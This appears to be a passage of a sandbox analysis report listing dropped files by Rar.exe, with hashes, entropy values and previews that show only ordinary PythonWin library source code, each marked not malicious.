                                                                                                                                                                                                                                  Preview:# vss.py -- Source Control using Microsoft VSS...# Provides routines for checking files out of VSS..#.# Uses an INI file very similar to how VB integrates with VSS - even.# as far as using the same name...# The file must be named "Mssccprj.scc", and be in the format of.# an INI file. This file may be in a parent directory, in which.# case the project name will be built from what is specified in the.# ini file, plus the path from the INI file to the file itself..#.# The INI file should have a [Python] section, and a.# Project=Project Name.# and optionally.# Database=??...import os.import sys.import traceback..import win32api.import win32ui..g_iniName = "Mssccprj.scc" # Use the same INI name as VB!..g_sourceSafe = None...def FindVssProjectInfo(fullfname):. """Looks up the file system for an INI file describing the project... Looking up the tree is for ni style packages... Returns (projectName, pathToFileName) where pathToFileName contains. the path from the ini file to the
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script text executable Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5650
                                                                                                                                                                                                                                  Entropy (8bit):4.72058456476038
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:0OE6xRFsaobwYSJRzaj8N7XyIV7SuU9hyoVE4rMur8m4mM1np9sbexg:0RwYQRucryKWE44CfAp9sbea
                                                                                                                                                                                                                                  MD5:B12DFEEC2AB8B1758C1567D42C490B7B
                                                                                                                                                                                                                                  SHA1:DEF28BEE0C8FD8D60FBF0FA24B27232FF7E242C1
                                                                                                                                                                                                                                  SHA-256:AE8B27C1BE4EC2C6F7031D5C648949A1AD3A97ED2348BDD6D4015B9BF2E5FC78
                                                                                                                                                                                                                                  SHA-512:65672DE52090E79AE6FAB0637FB438323B2C9B049CBF44FDF69538D736DC92FD30445F9FC809833F1EB265FB85097272D11C48DDA62ADC6526D07E6E9B53DDD6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# help.py - help utilities for PythonWin..import os..import regutil.import win32api.import win32con.import win32ui..htmlhelp_handle = None..html_help_command_translators = {. win32con.HELP_CONTENTS: 1, # HH_DISPLAY_TOC. win32con.HELP_CONTEXT: 15, # HH_HELP_CONTEXT. win32con.HELP_FINDER: 1, # HH_DISPLAY_TOC.}...def FinalizeHelp():. global htmlhelp_handle. if htmlhelp_handle is not None:. import win32help.. try:. # frame = win32ui.GetMainFrame().GetSafeHwnd(). frame = 0. win32help.HtmlHelp(frame, None, win32help.HH_UNINITIALIZE, htmlhelp_handle). except win32help.error:. print("Failed to finalize htmlhelp!"). htmlhelp_handle = None...def OpenHelpFile(fileName, helpCmd=None, helpArg=None):. "Open a help file, given a full path". # default help arg.. win32ui.DoWaitCursor(1). try:. if helpCmd is None:. helpCmd = win32con.HELP_CONTENTS. ext = os.path.splitext(fileNam
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):35912
                                                                                                                                                                                                                                  Entropy (8bit):4.631604153784839
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:x5X6GNjA+JE6JetPRGWrxoEAMcveFlGPDb22OzrDCqFq6CiTQ8ZUyI:xgGNjA+W6sbUkQok
                                                                                                                                                                                                                                  MD5:9CD632F14BE177B77B27EFA15380F89E
                                                                                                                                                                                                                                  SHA1:8609338B1A19E2991EF6A331051FCC046197FD8A
                                                                                                                                                                                                                                  SHA-256:7A37B60603FE6C5F541383AF8CC835DF73062B4CE72491E342D566AC3168F031
                                                                                                                                                                                                                                  SHA-512:230E5F663B955036E627162585D41DD85F80589706B326EE6150029B708D4A2D7C53A518339D146F287062D4AF0489B451F9FCEFE683ACEFF8A829E7DB6642AE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:##################################################################.##.## Interactive Shell Window.##..import array.import code.import os.import string.import sys.import traceback..import __main__.import afxres.import pywin.framework.app.import pywin.scintilla.control.import pywin.scintilla.formatter.import pywin.scintilla.IDLEenvironment.import win32api.import win32clipboard.import win32con.import win32ui..## sequential after ID_GOTO_LINE defined in editor.py.ID_EDIT_COPY_CODE = 0xE2002.ID_EDIT_EXEC_CLIPBOARD = 0x2003..trace = pywin.scintilla.formatter.trace..import re..from . import winout..# from IDLE.._is_block_opener = re.compile(r":\s*(#.*)?$").search._is_block_closer = re.compile(. r""". \s*. ( return. | break. | continue. | raise. | pass. ). \b.""",. re.VERBOSE,.).match..tracebackHeader = "Traceback (".encode("ascii")..sectionProfile = "Interactive Window".valueFormatTitle = "FormatTitle".valueFormatInput = "FormatInput".valueFormatOutput = "FormatO
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20154
                                                                                                                                                                                                                                  Entropy (8bit):4.47952669125256
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:YQXph3afslMnEYeo3cRofuJ+gbK+E3sCsphc:YQ5hDlMcafuJ+gXCUc
                                                                                                                                                                                                                                  MD5:494E4047F3A33557E19707AA57A6762D
                                                                                                                                                                                                                                  SHA1:607C10F0CC8CF0578C3ABDA73154782478249ECF
                                                                                                                                                                                                                                  SHA-256:A0735F8B7E4A68D0A90034FB3C6ADF4E2DE58E44AC5261736EEB9F2279B496D0
                                                                                                                                                                                                                                  SHA-512:5923ABA95A148D885E5E5AA13BDA469FB76DCEBCB1E32B581DD40A086DDD80F9CFD86800432C94C0700DE893775D41F3BFD7F0206D5B3E604110AE552D8D9FF6
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# intpyapp.py - Interactive Python application class.#.import os.import sys.import traceback..import __main__.import commctrl.import win32api.import win32con.import win32ui.from pywin.mfc import afxres, dialog..from . import app, dbgcommands..lastLocateFileName = ".py" # used in the "File/Locate" dialog......# todo - _SetupSharedMenu should be moved to a framework class..def _SetupSharedMenu_(self):. sharedMenu = self.GetSharedMenu(). from pywin.framework import toolmenu.. toolmenu.SetToolsMenu(sharedMenu). from pywin.framework import help.. help.SetHelpMenuOtherHelp(sharedMenu)...from pywin.mfc import docview..docview.DocTemplate._SetupSharedMenu_ = _SetupSharedMenu_...class MainFrame(app.MainFrame):. def OnCreate(self, createStruct):. self.closing = 0. if app.MainFrame.OnCreate(self, createStruct) == -1:. return -1. style = (. win32con.WS_CHILD. | afxres.CBRS_SIZE_DYNAMIC. | afxres.CBRS_TOP.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1564
                                                                                                                                                                                                                                  Entropy (8bit):4.499942146153649
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:ph+YT5jFg2RSOmjhvtmAWyAjw88eimLk08AWyAjkEspeejHG9hBHRtWyA:ph+kFVSOmqeii8k08eBEscW47HLA
                                                                                                                                                                                                                                  MD5:192776AD66CE552D0274AE61888C7F9A
                                                                                                                                                                                                                                  SHA1:8F4C51333E175B4F23ACB4D7FA1BFC1AF5D0190F
                                                                                                                                                                                                                                  SHA-256:70FF4889CF52DB82518A24C5EF8CD7666E26DEB0C05EC5769579EA5634542AF8
                                                                                                                                                                                                                                  SHA-512:CD74E054097A2A4BDAEA83BB8AF338CA27B95427D623CD423187E0A19E43EDABBCFB805600A2027FD711E161DFF585DBCB41102106BBCE60BFBB58F5DDC29978
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# DDE support for Pythonwin.#.# Seems to work fine (in the context that IE4 seems to have broken.# DDE on _all_ NT4 machines I have tried, but only when a "Command Prompt" window.# is open. Strange, but true. If you have problems with this, close all Command Prompts!...import sys.import traceback..import win32api.import win32ui.from dde import *.from pywin.mfc import object...class DDESystemTopic(object.Object):. def __init__(self, app):. self.app = app. object.Object.__init__(self, CreateServerSystemTopic()).. def Exec(self, data):. try:. # ...print "Executing", cmd. self.app.OnDDECommand(data). except:. t, v, tb = sys.exc_info(). # The DDE Execution failed.. print("Error executing DDE command."). traceback.print_exception(t, v, tb). return 0...class DDEServer(object.Object):. def __init__(self, app):. self.app = app. object.Object.__init__(self, CreateServ
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28975
                                                                                                                                                                                                                                  Entropy (8bit):4.5364847874971765
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:vyyYVP+wv0unqp3M8tkNdfoi0EiP+y0EWJWPl6kEF/ylQEqTEfDs2:6yYNB8uutEZ6GEqTEfDs2
                                                                                                                                                                                                                                  MD5:AF34F4E8CA5665CBD609C8D539D0C899
                                                                                                                                                                                                                                  SHA1:4748704FF60270C8760970AB0E96ED47900B394B
                                                                                                                                                                                                                                  SHA-256:5917B87F05758AD32E141DB916B83EBEC85F6C0E953B3C830875249E065638A2
                                                                                                                                                                                                                                  SHA-512:4289066989BBF6DEA727BD446D5626829C74E5FAC13B0424E7669A5A177A2261C7A0512DA3C4FFF0CC13498D9BB4F770923ECEC24392E598E9F1100B660D2804
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:######################################################################.##.## The Pychecker MDI Plug-In UserModule for Pythonwin.##.## contributed by Robert Kiendl.##.## Style is similar to (and inherited) from the SGrepMDI UserModule.##.## Usage:.##.## Start Pychecker on current file: Menu/File/New../Pychecker..## Use it: Jump to Pychecker warning source lines by double-click..## Auto-add "#$pycheck_no" / "#$pycheck_no=specific-re-pattern" tags.## to source lines by context/right-mouse-click on warning lines..##.## It requires pychecker installed and the pychecker.bat to be on.## the PATH. Example pychecker.bat:.##.## REM pychecker.bat.## C:\bin\python.exe C:\PYTHON23\Lib\site-packages\pychecker\checker.py %1 %2 %3 %4 %5 %6 %7 %8 %9.##.## Adding it as default module in PythonWin:.##.## +++ ./intpyapp.py.2006-10-02 17:59:32.974161600 +0200.## @@ -272,7 +282,7 @@.## .def LoadUserModules(self, moduleNames = None):.## ..# Load the users modules..## ..if moduleNames is None:.## -...d
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23232
                                                                                                                                                                                                                                  Entropy (8bit):4.625752024930352
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:oGBB+9o1Nl4fJsAgdeNVAOdlP9FB7yL8OndbFeEii786sA8:oIWo1Nl4aAX9KFdhZBsA8
                                                                                                                                                                                                                                  MD5:3FA91AE2F8D827F6F7493636E3EF42DE
                                                                                                                                                                                                                                  SHA1:A1858B85AB1647DCACE4C5DC1E4D743997AB30AE
                                                                                                                                                                                                                                  SHA-256:B7BA3C633BD8B912FACDBB0EB706F57785DF1F5137AF6E62503938B3042AAABC
                                                                                                                                                                                                                                  SHA-512:1EEE85598BFB3405D617CC12FFDF7B51DBD9F689E3634054FB23C56AB56BC94D33F13189FECAC9D95041B6C4FA351CC9D3C079D97ED9E9B38B7BBB1108813E8F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:""".Various utilities for running/importing a script.""".import bdb.import linecache.import os.import sys.import traceback..import __main__.import win32api.import win32con.import win32ui.from pywin.mfc import dialog.from pywin.mfc.docview import TreeView..from .cmdline import ParseArgs..RS_DEBUGGER_NONE = 0 # Dont run under the debugger..RS_DEBUGGER_STEP = 1 # Start stepping under the debugger.RS_DEBUGGER_GO = 2 # Just run under the debugger, stopping only at break-points..RS_DEBUGGER_PM = 3 # Dont run under debugger, but do post-mortem analysis on exception...debugging_options = """No debugging.Step-through in the debugger.Run in the debugger.Post-Mortem of unhandled exceptions""".split(. "\n".)..byte_cr = "\r".encode("ascii").byte_lf = "\n".encode("ascii").byte_crlf = "\r\n".encode("ascii")...# A dialog box for the "Run Script" command..class DlgRunScript(dialog.Dialog):. "A class for the 'run script' dialog".. def __init__(self, bHaveDebugger):. dialog.Dialog.__i
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):24972
                                                                                                                                                                                                                                  Entropy (8bit):4.450431007513399
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:H+YGPXCcujMf3MfDHIt0EiP+y0EiJW9elQENe8aQg:eYKScuLDHWGENe8aQg
                                                                                                                                                                                                                                  MD5:739FD32DA981B43D1CC9F7E98720017C
                                                                                                                                                                                                                                  SHA1:6EC45280E74CADCA61EA3BD1FEB16E23234E0284
                                                                                                                                                                                                                                  SHA-256:312C260C2E0385B6FBFE92975FC48943A8CEB34AF93D33D76E71497235CF155A
                                                                                                                                                                                                                                  SHA-512:56072052F6AABA2AFFAE9FEDBB3CDE6FE797720953645F65E741A01A8CEAC5FC04892F408076B1DF192E4F6DF81CDE85D9926CDAE686EBEC106337A67FA3E417
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# SGrepMDI is by Gordon McMillan (gmcm@hypernet.com).# It does basically what Find In Files does in MSVC with a couple enhancements..# - It saves any directories in the app's ini file (if you want to get rid.# .of them you'll have to edit the file).# - "Directories" can be directories,.# -.semicolon separated lists of "directories",.# -.environment variables that evaluate to "directories",.# -.registry path names that evaluate to "directories",.# -.all of which is recursive, so you can mix them all up..# - It is MDI, so you can 'nest' greps and return to earlier ones,.# .(ie, have multiple results open at the same time).# - Like FIF, double clicking a line opens an editor and takes you to the line..# - You can highlight text, right click and start a new grep with the selected.# .text as search pattern and same directories etc as before..# - You can save grep parameters (so you don't lose your hardearned pattern).# .from File|Save.# - You can save grep results by right clicking in t
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2847
                                                                                                                                                                                                                                  Entropy (8bit):4.818753732087679
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:MJ7O/20AAgRoSEyd/S4+u3SF6ESlltYCfr5ZiVJEF7xgj8PKOW+cZFQEgD9L62D6:KK/2ugRUyd/S4f3oS/e0r6Iaj8C3YAO6
                                                                                                                                                                                                                                  MD5:6F528ECE40B18F85CB4695E07DEF6DE5
                                                                                                                                                                                                                                  SHA1:047EF48463C4DFE1129AAA4C357B202F31CAA822
                                                                                                                                                                                                                                  SHA-256:0DBCAA89CD5101BA15092209C424DC8039082F472E94207632D2875F2F5CBB27
                                                                                                                                                                                                                                  SHA-512:5C73CD1B0455106A183DF3FF83E5E5925DFE9DC59FF6C1210D6094AF087863897B4295773F6C3F0096F5B32E2A2FA536F97B872EF92F3C76BABA497940C1F7E8
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# startup.py.#."The main application startup code for PythonWin."..#.# This does the basic command line handling...# Keep this as short as possible, cos error output is only redirected if.# this runs OK. Errors in imported modules are much better - the messages go somewhere (not any more :-)..import os.import sys..import win32api.import win32ui..if not sys.argv:. # Initialize sys.argv from commandline. When sys.argv is empty list (. # different from [''] meaning "no cmd line arguments" ), then C. # bootstrapping or another method of invocation failed to initialize. # sys.argv and it will be done here. ( This was a workaround for a bug in. # win32ui but is retained for other situations. ). argv = win32api.CommandLineToArgv(win32api.GetCommandLine()). sys.argv = argv[1:]. if os.getcwd() not in sys.path and "." not in sys.path:. sys.path.insert(0, os.getcwd())..# You may wish to redirect error output somewhere useful if you have startup errors..# eg, 'impor
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6584
                                                                                                                                                                                                                                  Entropy (8bit):4.430368341661001
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:S2A0DR1T8Is8HaxCYVN17vkgMMa14OnD0jdc2RoNQtDWjIH8wopCw:Sv091/BHaBvqztDJqtApT
                                                                                                                                                                                                                                  MD5:779DAA247AD98D623265DD978F8F45B2
                                                                                                                                                                                                                                  SHA1:228187723DEE7D4C4ECF4721A016E1834757DB96
                                                                                                                                                                                                                                  SHA-256:5AECCBD881306B45100F09997E93EED403E5D57809517BD7345F4D5ADC120CB6
                                                                                                                                                                                                                                  SHA-512:9511DE7A479F1311CE4B582D95CE66B101CB667D98AF8DD36580227D1EF048C62CBB8858DBFD7DC5C5C1096357B498D2803F6D9572A73682876080FA8598643F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Copyright (c) 2000 David Abrahams. Permission to copy, use, modify, sell.# and distribute this software is granted provided this copyright.# notice appears in all copies. This software is provided "as is" without.# express or implied warranty, and with no claim as to its suitability for.# any purpose.."""Provides a class Stdin which can be used to emulate the regular old.sys.stdin for the PythonWin interactive window. Right now it just pops.up a raw_input() dialog. With luck, someone will integrate it into the.actual PythonWin interactive window someday...WARNING: Importing this file automatically replaces sys.stdin with an.instance of Stdin (below). This is useful because you can just open.Stdin.py in PythonWin and hit the import button to get it set up right.if you don't feel like changing PythonWin's source. To put things back.the way they were, simply use this magic incantation:. import sys. sys.stdin = sys.stdin.real_file.""".import sys..try:. get_input_line = raw_input
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):9369
                                                                                                                                                                                                                                  Entropy (8bit):4.707765657430447
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:xthkUOPG+/2okmwXMdGwstrsgKQQJ3pcSPupD2yIAZw6cRoKd:xthXOPG+8MQwsFsJQQJEf2
                                                                                                                                                                                                                                  MD5:9EC0D59C03FD3B953B91793523CAC864
                                                                                                                                                                                                                                  SHA1:5A6153011FD0A34FC0D51E70F011E9AFA8C78863
                                                                                                                                                                                                                                  SHA-256:DE941FAB3EDD0213569A624E7F2DFC744D29A9282CCEFFA20E278B273F651220
                                                                                                                                                                                                                                  SHA-512:0670C2BFB1C7A6A7C0CA6ABE898390F44D762383745666A8F812C0077206F79C852F61F596F16B82867CC1736E919103909A3533E18FEFC2DA61C4A37AE932D7
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# toolmenu.py..import sys..import win32api.import win32con.import win32ui..from . import app..tools = {}.idPos = 100..# The default items should no tools menu exist in the INI file..defaultToolMenuItems = [. ("Browser", "win32ui.GetApp().OnViewBrowse(0,0)"),. (. "Browse PythonPath",. "from pywin.tools import browseProjects;browseProjects.Browse()",. ),. ("Edit Python Path", "from pywin.tools import regedit;regedit.EditRegistry()"),. ("COM Makepy utility", "from win32com.client import makepy;makepy.main()"),. (. "COM Browser",. "from win32com.client import combrowse;combrowse.main(modal=False)",. ),. (. "Trace Collector Debugging tool",. "from pywin.tools import TraceCollector;TraceCollector.MakeOutputWindow()",. ),.]...def LoadToolMenuItems():. # Load from the registry.. items = []. lookNo = 1. while 1:. menu = win32ui.GetProfileVal("Tools Menu\\%s" % lookNo, "", ""). if menu == "":.
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):535
                                                                                                                                                                                                                                  Entropy (8bit):4.9611604606840505
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12:HiTUyF6H3cWLwv9K1N1eSA+sV5S3Z6osf+Z6RLvDI6Xvn:HMUDMZ1U/e5/vS3ZDzZ+LbIon
                                                                                                                                                                                                                                  MD5:57D70F791843C91E65EE5E218775EDED
                                                                                                                                                                                                                                  SHA1:2594F2BAAA48A797FF9867C014A05A48644181CA
                                                                                                                                                                                                                                  SHA-256:89566D4A8CA81DDCD291909915F4C521DF04C4F08BD6EA1E73AAED121487CB08
                                                                                                                                                                                                                                  SHA-512:C04319B0BB8387B6885414F5542F8550D895360A9B3537F580406EBB9DA1BC3BE38F08B6435A91FF4E071EF0E5B8BD23C11EC8DF298582E437CF04CC12B35F6E
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# Framework Window classes...# Most Pythonwin windows should use these classes rather than.# the raw MFC ones if they want Pythonwin specific functionality..import pywin.mfc.window.import win32con...class MDIChildWnd(pywin.mfc.window.MDIChildWnd):. def AutoRestore(self):. "If the window is minimised or maximised, restore it.". p = self.GetWindowPlacement(). if p[1] == win32con.SW_MINIMIZE or p[1] == win32con.SW_SHOWMINIMIZED:. self.SetWindowPlacement(p[0], win32con.SW_RESTORE, p[2], p[3], p[4]).
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20312
                                                                                                                                                                                                                                  Entropy (8bit):4.581654387141737
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:OgI9C73YcqsFayUTx2kLt8DJ/kZfuz/+cyyRO9VS8r9iRoohZrKq5tVIXCrU0ZFm:g6qdLtSQuz/HyyI3SoYrb5PFU0Z1xSr
                                                                                                                                                                                                                                  MD5:9EB4277350EB49CB90C442D49ECA0631
                                                                                                                                                                                                                                  SHA1:17493C9248F1769BC6072C26DE77A879D9B9A262
                                                                                                                                                                                                                                  SHA-256:4A47F88AAE5E5B212869FC60828C2B53CDE3DC4B1F11B49889B59F65938BA26F
                                                                                                                                                                                                                                  SHA-512:8A05409A206E39A73C173F50AE85E06747237D75F7DB752B54645271670D1FFF099519C57965DB7376CA5A1249D5DD949D21F9033956E559F3392C3848B7DFBA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# winout.py.#.# generic "output window".#.# This Window will detect itself closing, and recreate next time output is.# written to it...# This has the option of writing output at idle time (by hooking the.# idle message, and queueing output) or writing as each.# write is executed..# Updating the window directly gives a jerky appearance as many writes.# take place between commands, and the windows scrolls, and updates etc.# Updating at idle-time may defer all output of a long process, giving the.# appearence nothing is happening..# There is a compromise "line" mode, which will output whenever.# a complete line is available...# behaviour depends on self.writeQueueing..# This module is thread safe - output can originate from any thread. If any thread.# other than the main thread attempts to print, it is always queued until next idle time..import queue.import re..import win32api.import win32con.import win32ui.from pywin.framework import app, window.from pywin.mfc import docview..debug = la
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2714
                                                                                                                                                                                                                                  Entropy (8bit):4.1476646118507166
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:7vWXdGptGxEeDlKcX33TplsHcM6rqQEeySqsHYu5sy+RMJdNoPzeaqeL7gH2:tLGrXdaQqf6VoGlAgW
                                                                                                                                                                                                                                  MD5:3EB71BFBAA8E711E20947793841139C0
                                                                                                                                                                                                                                  SHA1:71088FBC63CD92116EF379E2FA903174B4C1E59B
                                                                                                                                                                                                                                  SHA-256:E965226123BDEF4C98961BBB5BA88083F4E95AE42A07C4EE9F05D9DC6D22F009
                                                                                                                                                                                                                                  SHA-512:46FA954AE4BD9BCE3446F6C472446DF8F18B6B562227087F5251BAADEEAEDCE9506B078BE686625EBFADEC3DDD02321E336632A59482BB418C123396881F6971
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import re.import string..###$ event <<expand-word>>.###$ win <Alt-slash>.###$ unix <Alt-slash>...class AutoExpand:. keydefs = {. "<<expand-word>>": ["<Alt-slash>"],. }.. unix_keydefs = {. "<<expand-word>>": ["<Meta-slash>"],. }.. menudefs = [. (. "edit",. [. ("E_xpand word", "<<expand-word>>"),. ],. ),. ].. wordchars = string.ascii_letters + string.digits + "_".. def __init__(self, editwin):. self.text = editwin.text. self.text.wordlist = None # XXX what is this?. self.state = None.. def expand_word_event(self, event):. curinsert = self.text.index("insert"). curline = self.text.get("insert linestart", "insert lineend"). if not self.state:. words = self.getwords(). index = 0. else:. words, index, insert, line = self.state. if insert != curinsert or line != curline:. words = self
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):20682
                                                                                                                                                                                                                                  Entropy (8bit):4.252065700758349
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:kRBIJcF+o2ERXDljJwNBGsTACLu09QQhpyviqR66AARcTNh:kRqaDxDVJSACGR66AFh
                                                                                                                                                                                                                                  MD5:DC3B0E008D701AB5D77BDDB4A99F2046
                                                                                                                                                                                                                                  SHA1:424295FB0EF10C3677A893C6FAE6550A78D824FC
                                                                                                                                                                                                                                  SHA-256:8D0E00FAF18D7CDECFE4BB2C6961DB8DFBE73ED829042558B7A2AF59C8020DD8
                                                                                                                                                                                                                                  SHA-512:611A18CEEECEFFD56F02DFF50A4331EB09DFC2DA7805CCD28B8775EBCB4CCB2565BA23B5221C3EB8F517E5161A8EBEA8EADD978A880E284F550C6E76D908447F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:import sys.import tokenize..from pywin import default_scintilla_encoding..from . import PyParse..if sys.version_info < (3,):. # in py2k, tokenize() takes a 'token eater' callback, while. # generate_tokens is a generator that works with str objects.. token_generator = tokenize.generate_tokens.else:. # in py3k tokenize() is the generator working with 'byte' objects, and. # token_generator is the 'undocumented b/w compat' function that. # theoretically works with str objects - but actually seems to fail). token_generator = tokenize.tokenize...class AutoIndent:. menudefs = [. (. "edit",. [. None,. ("_Indent region", "<<indent-region>>"),. ("_Dedent region", "<<dedent-region>>"),. ("Comment _out region", "<<comment-region>>"),. ("U_ncomment region", "<<uncomment-region>>"),. ("Tabify region", "<<tabify-region>>"),. ("Untabify region",
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):6372
                                                                                                                                                                                                                                  Entropy (8bit):4.331987781000828
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:lbcnr/2NIhNSk8NLN7r77rUsgMuEB83xoCBs5qqsbAgVI/FnNn:lvSq5nLU7nqgov0kNNn
                                                                                                                                                                                                                                  MD5:8E4C2D3EBA3C17961CA827664F893BCF
                                                                                                                                                                                                                                  SHA1:E4C8E37C90E02158FEC807C433912043F7DA95E8
                                                                                                                                                                                                                                  SHA-256:3A3454E10F5519974B2E257DB21ECEF56113ED7E749E05D7BEAA9DEFA29C3088
                                                                                                                                                                                                                                  SHA-512:BD9DC7F1D8CE86BCC50DC80F75154F7540784DDAD55C62626FAEE2AB8D6367A0ECE4F22F559ACBEB0381FAE97B7B1F10320C3C4005B7EFF68B8619D5E38C35DE
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:# CallTips.py - An IDLE extension that provides "Call Tips" - ie, a floating window that.# displays parameter information as you open parens...import inspect.import string.import sys.import traceback...class CallTips:. menudefs = [].. keydefs = {. "<<paren-open>>": ["<Key-parenleft>"],. "<<paren-close>>": ["<Key-parenright>"],. "<<check-calltip-cancel>>": ["<KeyRelease>"],. "<<calltip-cancel>>": ["<ButtonPress>", "<Key-Escape>"],. }.. windows_keydefs = {}.. unix_keydefs = {}.. def __init__(self, editwin):. self.editwin = editwin. self.text = editwin.text. self.calltip = None. if hasattr(self.text, "make_calltip_window"):. self._make_calltip_window = self.text.make_calltip_window. else:. self._make_calltip_window = self._make_tk_calltip_window.. def close(self):. self._make_calltip_window = None.. # Makes a Tk based calltip window. Used by IDLE, but not Pythonwin.. # S
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\Rar.exe
                                                                                                                                                                                                                                  File Type:Python script, ASCII text executable
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):5727
                                                                                                                                                                                                                                  Entropy (8bit):4.394603822126328
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:5JDTx9FYoxvd46boQCPDvMX/+xCeRHdAi+gXFA0xl/yk/yd/aQ:T66vztpXGxCeRHdRtFAml6k6dCQ
                                                                                                                                                                                                                                  MD5:3CF25A5E5CB7402B113937BDAB4CC1B9
                                                                                                                                                                                                                                  SHA1:E357FC507FDBFA7C2D5DB9FAB73DAA6A4CFF6B5A
                                                                                                                                                                                                                                  SHA-256:C7809EB50F1FCF8F85E3D0867924DF2047FE121F13CF526CEBCB1401466BBCCD
